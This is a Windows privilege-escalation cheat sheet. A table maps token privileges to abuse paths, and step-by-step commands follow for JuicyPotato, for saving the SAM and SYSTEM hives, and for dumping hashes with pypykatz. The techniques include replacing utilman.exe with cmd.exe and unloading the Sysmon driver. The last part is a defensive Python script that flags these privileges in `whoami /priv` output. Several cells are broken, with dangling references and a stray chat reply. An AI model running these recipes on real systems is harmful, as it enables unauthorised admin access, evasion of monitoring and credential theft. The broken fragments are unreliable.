PRIVILEGES INFORMATION

| Privilege | Impact | Tool | Execution path | Remarks |
|---|---|---|---|---|
| SeAssignPrimaryToken | Admin | 3rd party tool | "It would allow a user to impersonate tokens and privesc to nt system using tools such as potato.exe, rottenpotato.exe and juicypotato.exe" | Thank you for the update. I will try to re-phrase it to something more recipe-like soon. |
| SeBackup | Threat | Built-in commands | Read sensitive files with `robocopy /b` | May be more interesting if you can read %WINDIR%\MEMORY.DMP. SeBackupPrivilege (and robocopy) is not helpful when it comes to open files. Robocopy requires both SeBackup and SeRestore to work with the /b parameter. |
| SeCreateToken | Admin | 3rd party tool | Create an arbitrary token including local admin rights with NtCreateToken. | |
| SeDebug | Admin | PowerShell | Duplicate the lsass.exe token. | Script to be found at |
| SeLoadDriver | Admin | 3rd party tool | 1. Load a buggy kernel driver such as szkg64.sys or capcom.sys. 2. Exploit the driver vulnerability. Alternatively, the privilege may be used to unload security-related drivers with the fltMC built-in command, i.e. `fltMC sysmondrv` | 1. The szkg64 vulnerability is listed as 2. The szkg64 was created by |
| SeRestore | Admin | PowerShell | 1. Launch PowerShell/ISE with the SeRestore privilege present. 2. Enable the privilege with ). 3. Rename utilman.exe to utilman.old. 4. Rename cmd.exe to utilman.exe. 5. Lock the console and press Win+U. | Attack may be detected by some AV software. Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege. |
| SeTakeOwnership | Admin | Built-in commands | 1. `takeown.exe /f "%windir%\system32"` 2. `icacls.exe "%windir%\system32" /grant "%username%":F` 3. Rename cmd.exe to utilman.exe. 4. Lock the console and press Win+U. | Attack may be detected by some AV software. Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege. |
| SeTcb | Admin | 3rd party tool | Manipulate tokens to have local admin rights included. May require SeImpersonate. To be verified. | |

Exploitation of each privilege mentioned above

Get on the victim machine and get a for potatoes.

Command to execute a script through a privileged user:

```
.\JuicyPotato.exe -t * -p c:\path\to\executable.bat -l 9002 -c '{CLSID}'
```

Save the SAM and SYSTEM hives:

```
cd c:\
mkdir Temp
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system
```

Download the files and use pypykatz to dump the hashes:

```
pypykatz registry --sam sam system
```
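The privilege names in the table are exactly what `whoami /priv` prints (with a `Privilege` suffix), so a token audit can be built on that output. The following is an added example, not part of the original page: it parses a constructed `whoami /priv` sample and reports which privileges from the table are present in the token, so a hardening check or triage script can flag a service account that holds them. `RISKY`, `SAMPLE`, `parse_whoami_priv` and `audit` are names chosen here.

```python
import re

# Impact column of the table above, keyed by the short privilege name.
RISKY = {
    "SeAssignPrimaryToken": "Admin", "SeBackup": "Threat",
    "SeCreateToken": "Admin", "SeDebug": "Admin",
    "SeLoadDriver": "Admin", "SeRestore": "Admin",
    "SeTakeOwnership": "Admin", "SeTcb": "Admin",
}

# Constructed sample of `whoami /priv` output (not captured from a real host).
SAMPLE = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeBackupPrivilege             Back up files and directories             Disabled
SeRestorePrivilege            Restore files and directories             Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
"""


def parse_whoami_priv(text):
    """Return {name: (description, state)}; column ends come from the '=' ruler."""
    lines = text.splitlines()
    ruler = next((i for i, line in enumerate(lines) if line.startswith("=")), None)
    if ruler is None:
        raise ValueError("no column ruler found; not `whoami /priv` output?")
    ends = [m.end() for m in re.finditer(r"=+", lines[ruler])]  # column end offsets
    privs = {}
    for row in lines[ruler + 1:]:
        if row.strip():  # skip trailing blank lines
            name = row[:ends[0]].strip()
            desc = row[ends[0]:ends[1]].strip()  # description may contain spaces
            privs[name] = (desc, row[ends[1]:].strip())
    return privs

def audit(text):
    """(short name, impact, state) for table privileges present in the token.
    Disabled ones are reported too: the holder can enable them (see SeRestore)."""
    hits = []
    for name, (_, state) in parse_whoami_priv(text).items():
        short = name[:-len("Privilege")] if name.endswith("Privilege") else name
        if short in RISKY:
            hits.append((short, RISKY[short], state))
    return hits
```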